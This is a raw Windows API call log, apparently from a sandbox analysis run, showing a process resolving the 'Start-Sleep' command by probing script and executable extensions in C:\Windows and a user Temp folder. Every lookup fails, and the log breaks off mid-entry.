[0264.287] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.287] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0264.287] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.287] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0264.287] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.287] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.287] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0264.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Sleep.psm1", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Sleep.psm1", lpFilePart=0x0) returned 0x1b [0264.287] GetFullPathNameW (in: lpFileName="Start-Sleep.psm1", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psm1", lpFilePart=0x0) returned 0x35 [0264.287] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psm1", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.287] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.288] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.psm1", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.288] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.288] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.289] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0264.289] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.289] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0264.289] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.289] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.289] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0264.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Sleep.psd1", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Sleep.psd1", lpFilePart=0x0) returned 0x1b [0264.289] GetFullPathNameW (in: lpFileName="Start-Sleep.psd1", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psd1", lpFilePart=0x0) returned 0x35 [0264.289] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psd1", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.289] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.290] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.psd1", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.290] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.290] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.290] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0264.290] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.290] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0264.290] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.290] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.291] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0264.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Sleep.COM", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Sleep.COM", lpFilePart=0x0) returned 0x1a [0264.291] GetFullPathNameW (in: lpFileName="Start-Sleep.COM", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.COM", lpFilePart=0x0) returned 0x34 [0264.291] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.COM", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.291] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.292] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.COM", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.292] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.292] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.292] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0264.292] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.292] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0264.293] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.EXE", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.293] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.332] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.EXE", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.332] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.334] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.BAT", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.334] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.335] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.BAT", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.335] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.336] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CMD", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.336] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.337] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.CMD", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.338] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.338] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBS", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.338] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.339] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.VBS", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.340] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.340] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.340] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0264.340] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.340] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0264.340] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.340] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.340] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0264.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Sleep.VBE", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Sleep.VBE", lpFilePart=0x0) returned 0x1a [0264.340] GetFullPathNameW (in: lpFileName="Start-Sleep.VBE", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBE", lpFilePart=0x0) returned 0x34 [0264.340] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBE", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.341] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.341] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.VBE", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.342] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.342] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.342] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0264.342] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.342] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0264.342] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.342] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.342] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0264.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Sleep.JS", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Sleep.JS", lpFilePart=0x0) returned 0x19 [0264.342] GetFullPathNameW (in: lpFileName="Start-Sleep.JS", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JS", lpFilePart=0x0) returned 0x33 [0264.342] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JS", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.342] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.343] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.JS", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.343] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.343] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.344] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0264.344] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.344] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0264.344] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.344] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.344] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0264.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Sleep.JSE", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Sleep.JSE", lpFilePart=0x0) returned 0x1a [0264.344] GetFullPathNameW (in: lpFileName="Start-Sleep.JSE", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JSE", lpFilePart=0x0) returned 0x34 [0264.344] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JSE", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.344] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.345] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.JSE", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.345] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.345] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.345] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0264.345] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.345] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0264.345] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.345] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.345] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0264.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Sleep.WSF", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Sleep.WSF", lpFilePart=0x0) returned 0x1a [0264.345] GetFullPathNameW (in: lpFileName="Start-Sleep.WSF", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSF", lpFilePart=0x0) returned 0x34 [0264.345] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSF", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.346] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.346] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.WSF", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.346] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.346] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.347] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0264.347] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.347] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0264.347] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.347] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.347] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0264.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Sleep.WSH", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Sleep.WSH", lpFilePart=0x0) returned 0x1a [0264.347] GetFullPathNameW (in: lpFileName="Start-Sleep.WSH", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: 